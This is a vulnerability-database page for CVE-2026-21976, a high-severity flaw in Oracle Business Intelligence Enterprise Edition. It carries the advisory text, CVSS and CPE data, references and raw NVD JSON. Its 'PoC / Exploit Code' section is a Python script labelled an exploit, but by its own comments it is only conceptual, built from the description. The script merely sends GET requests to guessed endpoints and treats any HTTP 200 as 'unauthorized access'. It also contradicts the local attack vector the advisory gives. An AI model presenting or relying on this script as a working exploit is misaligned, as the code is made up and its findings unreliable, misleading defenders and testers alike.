CVE-2026-21976

Description

Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Oracle Analytics Cloud). Supported versions that are affected are 7.6.0.0.0 and 8.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Business Intelligence Enterprise Edition executes to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N).

CVSS Details

CVSS Score

7.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:business_intelligence:7.6.0.0.0:*:*:*:enterprise:*:*:* - VULNERABLE

cpe:2.3:a:oracle:business_intelligence:8.2.0.0.0:*:*:*:enterprise:*:*:* - VULNERABLE

Oracle Business Intelligence Enterprise Edition 7.6.0.0.0

Oracle Business Intelligence Enterprise Edition 8.2.0.0.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-21976 PoC - Oracle Business Intelligence Enterprise Edition
# Note: This is a conceptual PoC based on vulnerability description
# Actual exploitation requires local access and low-privilege account

import requests
import sys
from urllib.parse import urljoin

def exploit_cve_2026_21976(target_url, username, password):
    """
    Conceptual exploit for CVE-2026-21976
    Target: Oracle Business Intelligence Enterprise Edition
    Attack Vector: Local access with low privilege account
    """
    print(f"[*] Targeting: {target_url}")
    print(f"[*] Using credentials: {username}/{password}")
    
    # Step 1: Authenticate with low-privilege account
    session = requests.Session()
    login_url = urljoin(target_url, '/analytics/saw.dll')
    
    # Step 2: Identify vulnerable endpoint in Oracle Analytics Cloud
    # The vulnerability allows unauthorized data manipulation
    vulnerable_endpoints = [
        '/analytics/api/v1/odata/',
        '/analytics/saw.dll/metadata',
        '/analytics/api/v1/subjectArea'
    ]
    
    # Step 3: Exploit the vulnerability
    for endpoint in vulnerable_endpoints:
        try:
            # Craft malicious request to bypass access control
            exploit_url = urljoin(target_url, endpoint)
            headers = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
                'X-Requested-With': 'XMLHttpRequest'
            }
            
            # This demonstrates unauthorized access attempt
            response = session.get(exploit_url, headers=headers, timeout=10)
            print(f"[+] Request to {endpoint}: Status {response.status_code}")
            
            if response.status_code == 200:
                print(f"[!] Potential unauthorized access detected at {endpoint}")
                return True
                
        except requests.RequestException as e:
            print(f"[-] Error accessing {endpoint}: {e}")
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print("Usage: python cve_2026_21976_poc.py <target_url> <username> <password>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    
    print("CVE-2026-21976 - Oracle Business Intelligence Enterprise Edition Exploit")
    print("=" * 70)
    exploit_cve_2026_21976(target, user, pwd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21976
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21976
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21976/
[4] VulDB https://vuldb.com/cve/CVE-2026-21976
[5] https://www.oracle.com/security-alerts/cpujan2026.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21976", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:16:00.850", "lastModified": "2026-01-29T14:46:40.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Analytics (component: Oracle Analytics Cloud). Supported versions that are affected are 7.6.0.0.0 and 8.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Business Intelligence Enterprise Edition executes to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Business Intelligence Enterprise Edition accessible data as well as unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto Oracle Business Intelligence Enterprise Edition de Oracle Analytics (componente: Oracle Analytics Cloud). Versiones compatibles que están afectadas son 7.6.0.0.0 y 8.2.0.0.0. Vulnerabilidad fácilmente explotable permite a un atacante con pocos privilegios con inicio de sesión en la infraestructura donde se ejecuta Oracle Business Intelligence Enterprise Edition comprometer Oracle Business Intelligence Enterprise Edition. Ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado de creación, eliminación o modificación a datos críticos o a todos los datos accesibles de Oracle Business Intelligence Enterprise Edition, así como acceso no autorizado a datos críticos o acceso completo a todos los datos accesibles de Oracle Business Intelligence Enterprise Edition. Puntuación base CVSS 3.1 de 7.1 (Impactos en la Confidencialidad y la Integridad). Vector CVSS: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:business_intelligence:7.6.0.0.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "43D14BEA-91DC-43B8-B733-5B4DF06E9D0D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:business_intelligence:8.2.0.0.0:*:*:*:enterprise:*:*:*", "matchCriteriaId": "5F31EEDA-FA38-419C-8AF8-CAB10EA8432F"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}